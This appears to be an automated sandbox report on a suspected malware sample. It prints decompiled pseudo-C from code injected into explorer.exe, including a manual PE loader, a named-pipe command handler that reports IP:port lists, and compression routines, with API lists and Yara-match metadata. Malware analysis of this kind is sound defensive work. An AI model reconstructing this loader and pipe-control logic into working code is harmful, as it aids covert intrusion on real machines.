                                                                                                            									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                                                            								}
                                                                                                            								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                            									 *_v24 = _v68;
                                                                                                            								} else {
                                                                                                            									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                                                            								}
                                                                                                            								_v24 =  &(_v24[1]);
                                                                                                            								_v72 = _v72 + 4;
                                                                                                            							}
                                                                                                            							_v16 = _v16 + 0x14;
                                                                                                            							continue;
                                                                                                            						} else {
                                                                                                            							_t273 = 0xfffffffd;
                                                                                                            							return _t273;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					goto L35;
                                                                                                            				}
                                                                                                            				_t278 = 8;
                                                                                                            				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
                                                                                                            				_t280 = 8;
                                                                                                            				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
                                                                                                            				while(0 != 0) {
                                                                                                            				}
                                                                                                            				while(_v56 > 0) {
                                                                                                            					_v28 = _v52[2];
                                                                                                            					_v56 = _v56 - _v28;
                                                                                                            					_v28 = _v28 - 8;
                                                                                                            					_v28 = _v28 >> 1;
                                                                                                            					_v32 =  &(_v52[4]);
                                                                                                            					_v92 = _a4 +  *_v52;
                                                                                                            					_v60 = _v28;
                                                                                                            					while(1) {
                                                                                                            						_v88 = _v60;
                                                                                                            						_v60 = _v60 - 1;
                                                                                                            						if(_v88 == 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                            						_v12 =  *_v32 & 0xfff;
                                                                                                            						_v48 = (_v12 & 0x0000ffff) + _v92;
                                                                                                            						if((_v5 & 0x000000ff) != 3) {
                                                                                                            							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                            								 *_v48 =  *_v48 + _v64;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							 *_v48 =  *_v48 + _v64;
                                                                                                            						}
                                                                                                            						_v32 =  &(_v32[1]);
                                                                                                            					}
                                                                                                            					_v52 = _v32;
                                                                                                            				}
                                                                                                            				goto L13;
                                                                                                            			}









































                                                                                                            0x00000000
                                                                                                            0x032f3f73
                                                                                                            0x032f3f75
                                                                                                            0x00000000
                                                                                                            0x032f3f75
                                                                                                            0x032f3f71
                                                                                                            0x00000000
                                                                                                            0x032f3f34
                                                                                                            0x032f3e17
                                                                                                            0x032f3e25
                                                                                                            0x032f3e2a
                                                                                                            0x032f3e35
                                                                                                            0x032f3e38
                                                                                                            0x032f3e3c
                                                                                                            0x032f3e3e
                                                                                                            0x032f3e4e
                                                                                                            0x032f3e57
                                                                                                            0x032f3e60
                                                                                                            0x032f3e68
                                                                                                            0x032f3e71
                                                                                                            0x032f3e7c
                                                                                                            0x032f3e82
                                                                                                            0x032f3e85
                                                                                                            0x032f3e88
                                                                                                            0x032f3e8f
                                                                                                            0x032f3e96
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f3ea1
                                                                                                            0x032f3eaf
                                                                                                            0x032f3eba
                                                                                                            0x032f3ec4
                                                                                                            0x032f3edc
                                                                                                            0x032f3ee9
                                                                                                            0x032f3ee9
                                                                                                            0x032f3ec6
                                                                                                            0x032f3ed1
                                                                                                            0x032f3ed1
                                                                                                            0x032f3ef0
                                                                                                            0x032f3ef0
                                                                                                            0x032f3ef8
                                                                                                            0x032f3ef8
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 032F3F4B
                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 032F3F64
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 032F3FC0
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 032F3FDF
                                                                                                            • lstrcmpA.KERNEL32(?,00000000), ref: 032F40D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1872726118-0
                                                                                                            • Opcode ID: ba68ef8c4877d586df70e591b7e6e97e3b85c164401db47df0f82c9530b54c11
                                                                                                            • Instruction ID: 15ec572404605c2e8bb0e6217e6b8733affd239389caea35e9fc4fba0f52c948
                                                                                                            • Opcode Fuzzy Hash: ba68ef8c4877d586df70e591b7e6e97e3b85c164401db47df0f82c9530b54c11
                                                                                                            • Instruction Fuzzy Hash: 5DE1A074A2020ADFCB14DFA9C884AAEFBB1FF08354F148569EA15EB351D774A981CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                            • API String ID: 0-2132903582
                                                                                                            • Opcode ID: 9a3347c7f21785ca9d4fef630e77510c101c6e862787794ec493f81df2af0f75
                                                                                                            • Instruction ID: dbaec17d71e1e1ca787a6ec2829fa2913ec4e43205d94d0c4238ed348451d342
                                                                                                            • Opcode Fuzzy Hash: 9a3347c7f21785ca9d4fef630e77510c101c6e862787794ec493f81df2af0f75
                                                                                                            • Instruction Fuzzy Hash: 4641C731A30206DFDB28D96CCD9DBBEF658DF45614F980135FF0296284F2A1A9F1C651
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E032F33F7(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                            				signed int _t12;
                                                                                                            				signed int _t13;
                                                                                                            				signed int _t23;
                                                                                                            				void* _t30;
                                                                                                            				char* _t31;
                                                                                                            				char* _t33;
                                                                                                            				char* _t35;
                                                                                                            				char* _t37;
                                                                                                            				char* _t38;
                                                                                                            				long long* _t40;
                                                                                                            
                                                                                                            				_t30 = __edi;
                                                                                                            				_t12 = _a20;
                                                                                                            				if(_t12 == 0) {
                                                                                                            					_t12 = 0x11;
                                                                                                            				}
                                                                                                            				_t35 = _a4;
                                                                                                            				_push(_t25);
                                                                                                            				 *_t40 = _a12;
                                                                                                            				_push(_t12);
                                                                                                            				_push("%.*g");
                                                                                                            				_push(_a8);
                                                                                                            				_push(_t35);
                                                                                                            				L032F3550();
                                                                                                            				_t23 = _t12;
                                                                                                            				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                            					L16:
                                                                                                            					_t13 = _t12 | 0xffffffff;
                                                                                                            					goto L17;
                                                                                                            				} else {
                                                                                                            					E032F33D0(_t12, _t35);
                                                                                                            					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                            						L8:
                                                                                                            						_push(_t30);
                                                                                                            						_t37 = strchr(_t35, 0x65);
                                                                                                            						_t31 = _t37;
                                                                                                            						if(_t37 == 0) {
                                                                                                            							L15:
                                                                                                            							_t13 = _t23;
                                                                                                            							L17:
                                                                                                            							return _t13;
                                                                                                            						}
                                                                                                            						_t38 = _t37 + 1;
                                                                                                            						_t33 = _t31 + 2;
                                                                                                            						if( *_t38 == 0x2d) {
                                                                                                            							_t38 = _t33;
                                                                                                            						}
                                                                                                            						while( *_t33 == 0x30) {
                                                                                                            							_t33 = _t33 + 1;
                                                                                                            						}
                                                                                                            						if(_t33 != _t38) {
                                                                                                            							E032E8E72(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                            							_t23 = _t23 + _t38 - _t33;
                                                                                                            						}
                                                                                                            						goto L15;
                                                                                                            					} else {
                                                                                                            						_t6 = _t23 + 3; // 0x32f1be2
                                                                                                            						_t12 = _t6;
                                                                                                            						if(_t12 >= _a8) {
                                                                                                            							goto L16;
                                                                                                            						}
                                                                                                            						_t35[_t23] = 0x302e;
                                                                                                            						( &(_t35[2]))[_t23] = 0;
                                                                                                            						_t23 = _t23 + 2;
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}














                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: strchr$_snprintf
                                                                                                            • String ID: %.*g
                                                                                                            • API String ID: 3619936089-952554281
                                                                                                            • Opcode ID: 5fd368ae9d7c0a5a2d5fbe829e8c482e7c23a1b56095f6b0901ed41ea96e81f3
                                                                                                            • Instruction ID: 69c85acb039d2e6f0cbfd33052e43642a57b60e81a8fffa41a4bb2fd318e36f3
                                                                                                            • Opcode Fuzzy Hash: 5fd368ae9d7c0a5a2d5fbe829e8c482e7c23a1b56095f6b0901ed41ea96e81f3
                                                                                                            • Instruction Fuzzy Hash: 8221F03E624E162EDB23DA289C81FAAF79C9F44624F184179FF048A280E7A4D9C443D5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 62%
                                                                                                            			E032E371E(void* __fp0) {
                                                                                                            				signed int _v144;
                                                                                                            				signed int _v152;
                                                                                                            				char _v160;
                                                                                                            				char _v164;
                                                                                                            				char _v168;
                                                                                                            				signed int _v172;
                                                                                                            				char _v176;
                                                                                                            				intOrPtr _v180;
                                                                                                            				signed int _v184;
                                                                                                            				signed int _v188;
                                                                                                            				signed int _v192;
                                                                                                            				signed int _v196;
                                                                                                            				char _v200;
                                                                                                            				signed int _v204;
                                                                                                            				intOrPtr _t72;
                                                                                                            				intOrPtr _t75;
                                                                                                            				signed int _t80;
                                                                                                            				signed int _t81;
                                                                                                            				signed int _t84;
                                                                                                            				signed int _t87;
                                                                                                            				signed int _t88;
                                                                                                            				signed int _t100;
                                                                                                            				void* _t102;
                                                                                                            				void* _t103;
                                                                                                            				unsigned int* _t104;
                                                                                                            				signed int _t110;
                                                                                                            				signed int _t113;
                                                                                                            				void* _t118;
                                                                                                            				intOrPtr _t124;
                                                                                                            				signed int _t127;
                                                                                                            				intOrPtr _t129;
                                                                                                            				intOrPtr _t132;
                                                                                                            				void* _t133;
                                                                                                            				void* _t136;
                                                                                                            				signed int _t145;
                                                                                                            				signed int _t147;
                                                                                                            				signed short* _t148;
                                                                                                            				signed int _t158;
                                                                                                            				intOrPtr* _t182;
                                                                                                            				void* _t186;
                                                                                                            				void* _t187;
                                                                                                            				void* _t188;
                                                                                                            				signed short* _t191;
                                                                                                            				void* _t195;
                                                                                                            				signed int _t198;
                                                                                                            				signed int _t199;
                                                                                                            				signed int _t203;
                                                                                                            				signed int _t204;
                                                                                                            				char _t205;
                                                                                                            				signed int _t207;
                                                                                                            				void* _t209;
                                                                                                            				void* _t215;
                                                                                                            				void* _t222;
                                                                                                            
                                                                                                            				_t222 = __fp0;
                                                                                                            				_t209 = (_t207 & 0xfffffff8) - 0xac;
                                                                                                            				_v144 = 0;
                                                                                                            				_v172 = 0;
                                                                                                            				while(1) {
                                                                                                            					_t72 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_push(0);
                                                                                                            					_push( *0x32ff8c4);
                                                                                                            					_v152 = 0;
                                                                                                            					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_push(0);
                                                                                                            					_push( &_v160);
                                                                                                            					_t75 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_push(0x80000);
                                                                                                            					_push( *0x32ff984);
                                                                                                            					_push( *0x32ff8c4);
                                                                                                            					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
                                                                                                            						GetLastError();
                                                                                                            						goto L56;
                                                                                                            					} else {
                                                                                                            						_t148 =  *0x32ff984; // 0x0
                                                                                                            						_t80 =  *_t148 & 0x0000ffff;
                                                                                                            						_t215 = _t80 - 8;
                                                                                                            						if(_t215 > 0) {
                                                                                                            							_t81 = _t80 - 9;
                                                                                                            							__eflags = _t81;
                                                                                                            							if(_t81 == 0) {
                                                                                                            								E032F09E0( &_v200);
                                                                                                            								L12:
                                                                                                            								_t84 =  &_v200;
                                                                                                            								L13:
                                                                                                            								_push(4);
                                                                                                            								L14:
                                                                                                            								_push(_t84);
                                                                                                            								_push(5);
                                                                                                            								L31:
                                                                                                            								_pop(_t186);
                                                                                                            								E032ED2AB(_t186);
                                                                                                            								L32:
                                                                                                            								L56:
                                                                                                            								DisconnectNamedPipe( *0x32ff8c4);
                                                                                                            								_push(0);
                                                                                                            								_pop(0);
                                                                                                            								_push(1);
                                                                                                            								_pop(1);
                                                                                                            								if(_v172 == 0) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t87 = _t81;
                                                                                                            							__eflags = _t87;
                                                                                                            							if(_t87 == 0) {
                                                                                                            								_v204 = 0;
                                                                                                            								_t88 = E032E16B0( &_v204, _t222);
                                                                                                            								_v188 = _t88;
                                                                                                            								__eflags = _t88;
                                                                                                            								if(_t88 == 0) {
                                                                                                            									_push(4);
                                                                                                            									_v192 = 0;
                                                                                                            									_push( &_v192);
                                                                                                            									L19:
                                                                                                            									_push(0xa);
                                                                                                            									goto L31;
                                                                                                            								}
                                                                                                            								_t145 = _v204;
                                                                                                            								_t90 = _t145 * 0x16;
                                                                                                            								_v184 = _t145 * 0x16;
                                                                                                            								_t203 = E032E8D70(_t90);
                                                                                                            								_v192 = _t203;
                                                                                                            								__eflags = _t203;
                                                                                                            								if(_t203 == 0) {
                                                                                                            									_t64 =  &_v192;
                                                                                                            									 *_t64 = _v192 & 0x00000000;
                                                                                                            									__eflags =  *_t64;
                                                                                                            									_push(4);
                                                                                                            									_push( &_v192);
                                                                                                            									_t187 = 0xa;
                                                                                                            									E032ED2AB(_t187);
                                                                                                            									L52:
                                                                                                            									E032E8D86( &_v188, _t145);
                                                                                                            									goto L32;
                                                                                                            								}
                                                                                                            								_t198 = 0;
                                                                                                            								__eflags = _t145;
                                                                                                            								if(_t145 == 0) {
                                                                                                            									L50:
                                                                                                            									_push(E032EA5DA(_t203));
                                                                                                            									_push(_t203);
                                                                                                            									_t188 = 5;
                                                                                                            									E032ED2AB(_t188);
                                                                                                            									E032E8D86( &_v192, 0xffffffff);
                                                                                                            									_t209 = _t209 + 0x10;
                                                                                                            									goto L52;
                                                                                                            								}
                                                                                                            								_t158 = _v188 + 4;
                                                                                                            								__eflags = _t158;
                                                                                                            								_v204 = _t158;
                                                                                                            								do {
                                                                                                            									__eflags = _t198;
                                                                                                            									if(_t198 != 0) {
                                                                                                            										__eflags = _t198 - _t145 - 1;
                                                                                                            										if(_t198 < _t145 - 1) {
                                                                                                            											_t102 = E032EA5DA(_t203);
                                                                                                            											_t158 = _v204;
                                                                                                            											 *((short*)(_t102 + _t203)) = 0x3b;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									_t100 =  *_t158;
                                                                                                            									_v196 = _t100;
                                                                                                            									__eflags = _t100;
                                                                                                            									if(_t100 != 0) {
                                                                                                            										_t103 = E032EA5DA(_t203);
                                                                                                            										_t104 = _v204;
                                                                                                            										_push(_t104[1] & 0x0000ffff);
                                                                                                            										_push( *_t104 >> 0x18);
                                                                                                            										_push(_t104[0] & 0x000000ff);
                                                                                                            										_push(_t104[0] & 0x000000ff);
                                                                                                            										_t110 = E032EA5DA(_t203) + _t203;
                                                                                                            										__eflags = _t110;
                                                                                                            										E032E9FAF(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
                                                                                                            										_t158 = _v204;
                                                                                                            										_t209 = _t209 + 0x20;
                                                                                                            									}
                                                                                                            									_t198 = _t198 + 1;
                                                                                                            									_t158 = _t158 + 0x20;
                                                                                                            									_v204 = _t158;
                                                                                                            									__eflags = _t198 - _t145;
                                                                                                            								} while (_t198 < _t145);
                                                                                                            								goto L50;
                                                                                                            							}
                                                                                                            							__eflags = _t87 != 1;
                                                                                                            							if(_t87 != 1) {
                                                                                                            								goto L56;
                                                                                                            							}
                                                                                                            							_v204 = 0;
                                                                                                            							_t113 = E032E16B0( &_v204, _t222);
                                                                                                            							_t204 = _v204;
                                                                                                            							_v196 = _t113;
                                                                                                            							__eflags = _t113;
                                                                                                            							if(_t113 != 0) {
                                                                                                            								E032E8D86( &_v196, _t204);
                                                                                                            							}
                                                                                                            							_v204 = _t204 * 0x16;
                                                                                                            							_t84 =  &_v204;
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            						if(_t215 == 0) {
                                                                                                            							_t84 = E032F09E0( &_v200);
                                                                                                            							L16:
                                                                                                            							__eflags = _t84;
                                                                                                            							if(_t84 == 0) {
                                                                                                            								_push(0);
                                                                                                            								_push(0);
                                                                                                            								goto L19;
                                                                                                            							}
                                                                                                            							_push(_v200);
                                                                                                            							goto L14;
                                                                                                            						}
                                                                                                            						_t118 = _t80 - 1;
                                                                                                            						if(_t118 == 0) {
                                                                                                            							_t199 = E032E9CD0( &(_t148[4]), 0x20, 1,  &_v176);
                                                                                                            							_v196 = _t199;
                                                                                                            							__eflags = _t199;
                                                                                                            							if(_t199 == 0) {
                                                                                                            								L30:
                                                                                                            								_t191 =  *0x32ff984; // 0x0
                                                                                                            								E032EA078( &_v164,  &(_t191[4]), 0x80);
                                                                                                            								_push(0x84);
                                                                                                            								_push( &_v168);
                                                                                                            								_push(2);
                                                                                                            								goto L31;
                                                                                                            							}
                                                                                                            							_t205 = _v176;
                                                                                                            							__eflags = _t205 - 1;
                                                                                                            							if(__eflags <= 0) {
                                                                                                            								_t124 = E032E1D6E(E032EA10C( *_t199, __eflags), 0, 0, 0);
                                                                                                            								_t209 = _t209 + 0x10;
                                                                                                            								_v168 = _t124;
                                                                                                            								goto L30;
                                                                                                            							}
                                                                                                            							_t125 = _t205 - 1;
                                                                                                            							_v184 = _t205 - 1;
                                                                                                            							_t127 = E032E8D70(_t125 << 2);
                                                                                                            							_v188 = _t127;
                                                                                                            							__eflags = _t127;
                                                                                                            							if(_t127 == 0) {
                                                                                                            								goto L30;
                                                                                                            							}
                                                                                                            							_t147 = 1;
                                                                                                            							__eflags = _t205 - 1;
                                                                                                            							if(__eflags <= 0) {
                                                                                                            								L28:
                                                                                                            								_t129 = E032E1D6E(E032EA10C( *_t199, __eflags), _t127, _v184, 0);
                                                                                                            								_t209 = _t209 + 0x10;
                                                                                                            								_v168 = _t129;
                                                                                                            								E032E9DC9( &_v176);
                                                                                                            								goto L30;
                                                                                                            							}
                                                                                                            							_v204 = _t127;
                                                                                                            							do {
                                                                                                            								_t132 = E032E9A1D( *((intOrPtr*)(_t199 + _t147 * 4)), E032EA5DA( *((intOrPtr*)(_t199 + _t147 * 4))));
                                                                                                            								_t182 = _v204;
                                                                                                            								_t147 = _t147 + 1;
                                                                                                            								 *_t182 = _t132;
                                                                                                            								_v204 = _t182 + 4;
                                                                                                            								__eflags = _t147 - _t205;
                                                                                                            							} while (__eflags < 0);
                                                                                                            							_t127 = _v188;
                                                                                                            							goto L28;
                                                                                                            						}
                                                                                                            						_t133 = _t118 - 3;
                                                                                                            						if(_t133 == 0) {
                                                                                                            							_push(0);
                                                                                                            							_push(0);
                                                                                                            							_t195 = 5;
                                                                                                            							E032ED2AB(_t195);
                                                                                                            							 *0x32ff9b8 = 1;
                                                                                                            							_v172 = 1;
                                                                                                            							goto L56;
                                                                                                            						}
                                                                                                            						_t136 = _t133;
                                                                                                            						if(_t136 == 0) {
                                                                                                            							_t84 = E032F09BE( &_v200);
                                                                                                            							goto L16;
                                                                                                            						}
                                                                                                            						if(_t136 != 1) {
                                                                                                            							goto L56;
                                                                                                            						}
                                                                                                            						E032F09BE( &_v200);
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32 ref: 032E3754
                                                                                                              • Part of subcall function 032ED2AB: FlushFileBuffers.KERNEL32(00000000,?,032E3A64,00000000,00000004), ref: 032ED2F1
                                                                                                            • DisconnectNamedPipe.KERNEL32 ref: 032E3AA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                            • String ID: %u.%u.%u.%u:%u
                                                                                                            • API String ID: 465096328-3858738763
                                                                                                            • Opcode ID: 29be193d221579311592e54ab2e4dca449646bb3da89797699d99b8ffd85b9e1
                                                                                                            • Instruction ID: c047f0736b5f51b2b3e057f3349ced5d99befd0ccb50757333a220a745a95e5b
                                                                                                            • Opcode Fuzzy Hash: 29be193d221579311592e54ab2e4dca449646bb3da89797699d99b8ffd85b9e1
                                                                                                            • Instruction Fuzzy Hash: 5DA10979528302AFD314EF64E886A6BB7E8FF85711F84892EF2549B280DB70D5C4CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 99%
                                                                                                            			E032F4180(int _a4, signed int _a8) {
                                                                                                            				int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				signed int _v16;
                                                                                                            				void* __esi;
                                                                                                            				void* _t137;
                                                                                                            				signed int _t141;
                                                                                                            				intOrPtr* _t142;
                                                                                                            				signed int _t145;
                                                                                                            				signed int _t146;
                                                                                                            				intOrPtr _t151;
                                                                                                            				intOrPtr _t161;
                                                                                                            				intOrPtr _t162;
                                                                                                            				intOrPtr _t167;
                                                                                                            				intOrPtr _t170;
                                                                                                            				signed int _t172;
                                                                                                            				intOrPtr _t173;
                                                                                                            				int _t184;
                                                                                                            				intOrPtr _t185;
                                                                                                            				intOrPtr _t188;
                                                                                                            				signed int _t189;
                                                                                                            				void* _t195;
                                                                                                            				int _t202;
                                                                                                            				int _t208;
                                                                                                            				intOrPtr _t217;
                                                                                                            				signed int _t218;
                                                                                                            				int _t219;
                                                                                                            				intOrPtr _t220;
                                                                                                            				signed int _t221;
                                                                                                            				signed int _t222;
                                                                                                            				int _t224;
                                                                                                            				int _t225;
                                                                                                            				signed int _t227;
                                                                                                            				intOrPtr _t228;
                                                                                                            				int _t232;
                                                                                                            				int _t234;
                                                                                                            				signed int _t235;
                                                                                                            				int _t239;
                                                                                                            				void* _t240;
                                                                                                            				int _t245;
                                                                                                            				int _t252;
                                                                                                            				signed int _t253;
                                                                                                            				int _t254;
                                                                                                            				void* _t257;
                                                                                                            				void* _t258;
                                                                                                            				int _t259;
                                                                                                            				intOrPtr _t260;
                                                                                                            				int _t261;
                                                                                                            				signed int _t269;
                                                                                                            				signed int _t271;
                                                                                                            				intOrPtr* _t272;
                                                                                                            				void* _t273;
                                                                                                            
                                                                                                            				_t253 = _a8;
                                                                                                            				_t272 = _a4;
                                                                                                            				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                            				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                            				_t228 =  *_t4;
                                                                                                            				_t137 =  *_t3 + 0xfffffffb;
                                                                                                            				_t229 =  <=  ? _t137 : _t228;
                                                                                                            				_v16 =  <=  ? _t137 : _t228;
                                                                                                            				_t269 = 0;
                                                                                                            				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                            				asm("o16 nop [eax+eax]");
                                                                                                            				while(1) {
                                                                                                            					_t8 = _t272 + 0x16bc; // 0x5deed9c3
                                                                                                            					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                            					_v12 = 0xffff;
                                                                                                            					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                            					if(_t217 < _t141) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t11 = _t272 + 0x6c; // 0xf8e4158b
                                                                                                            					_t12 = _t272 + 0x5c; // 0x35e85000
                                                                                                            					_t245 =  *_t11 -  *_t12;
                                                                                                            					_v8 = _t245;
                                                                                                            					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                            					_t247 =  <  ? _t195 : _v12;
                                                                                                            					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                            					if(_t227 >= _v16) {
                                                                                                            						L7:
                                                                                                            						if(_t253 != 4) {
                                                                                                            							L10:
                                                                                                            							_t269 = 0;
                                                                                                            							__eflags = 0;
                                                                                                            						} else {
                                                                                                            							_t285 = _t227 - _t195;
                                                                                                            							if(_t227 != _t195) {
                                                                                                            								goto L10;
                                                                                                            							} else {
                                                                                                            								_t269 = _t253 - 3;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						E032F71A0(_t272, _t272, 0, 0, _t269);
                                                                                                            						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                            						_t19 = _t272 + 8; // 0x8d000040
                                                                                                            						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                            						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                            						_t23 = _t272 + 8; // 0x8d000040
                                                                                                            						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                            						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                            						_t27 = _t272 + 8; // 0x8d000040
                                                                                                            						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                            						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                            						_t31 = _t272 + 8; // 0x8d000040
                                                                                                            						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                            						E032F5F00(_t285,  *_t272);
                                                                                                            						_t202 = _v8;
                                                                                                            						_t273 = _t273 + 0x14;
                                                                                                            						if(_t202 != 0) {
                                                                                                            							_t208 =  >  ? _t227 : _t202;
                                                                                                            							_v8 = _t208;
                                                                                                            							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                            							_t37 = _t272 + 0x5c; // 0x35e85000
                                                                                                            							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                            							_t273 = _t273 + 0xc;
                                                                                                            							_t252 = _v8;
                                                                                                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                            							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                            							_t227 = _t227 - _t252;
                                                                                                            						}
                                                                                                            						if(_t227 != 0) {
                                                                                                            							E032F6040( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                            							_t273 = _t273 + 0xc;
                                                                                                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                            						}
                                                                                                            						_t253 = _a8;
                                                                                                            						if(_t269 == 0) {
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						if(_t227 != 0 || _t253 == 4) {
                                                                                                            							if(_t253 != 0 && _t227 == _t195) {
                                                                                                            								goto L7;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					break;
                                                                                                            				}
                                                                                                            				_t142 =  *_t272;
                                                                                                            				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                            				_a4 = _t232;
                                                                                                            				if(_t232 == 0) {
                                                                                                            					_t83 = _t272 + 0x6c; // 0xf8e4158b
                                                                                                            					_t254 =  *_t83;
                                                                                                            				} else {
                                                                                                            					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                            					_t224 =  *_t59;
                                                                                                            					if(_t232 < _t224) {
                                                                                                            						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                                                            						_t66 = _t272 + 0x6c; // 0xf8e4158b
                                                                                                            						_t260 =  *_t66;
                                                                                                            						__eflags =  *_t65 - _t260 - _t232;
                                                                                                            						if( *_t65 - _t260 <= _t232) {
                                                                                                            							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                                                            							_t261 = _t260 - _t224;
                                                                                                            							 *(_t272 + 0x6c) = _t261;
                                                                                                            							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                                                            							_t70 = _t272 + 0x16b0; // 0x830a74c0
                                                                                                            							_t188 =  *_t70;
                                                                                                            							_t273 = _t273 + 0xc;
                                                                                                            							_t232 = _a4;
                                                                                                            							__eflags = _t188 - 2;
                                                                                                            							if(_t188 < 2) {
                                                                                                            								_t189 = _t188 + 1;
                                                                                                            								__eflags = _t189;
                                                                                                            								 *(_t272 + 0x16b0) = _t189;
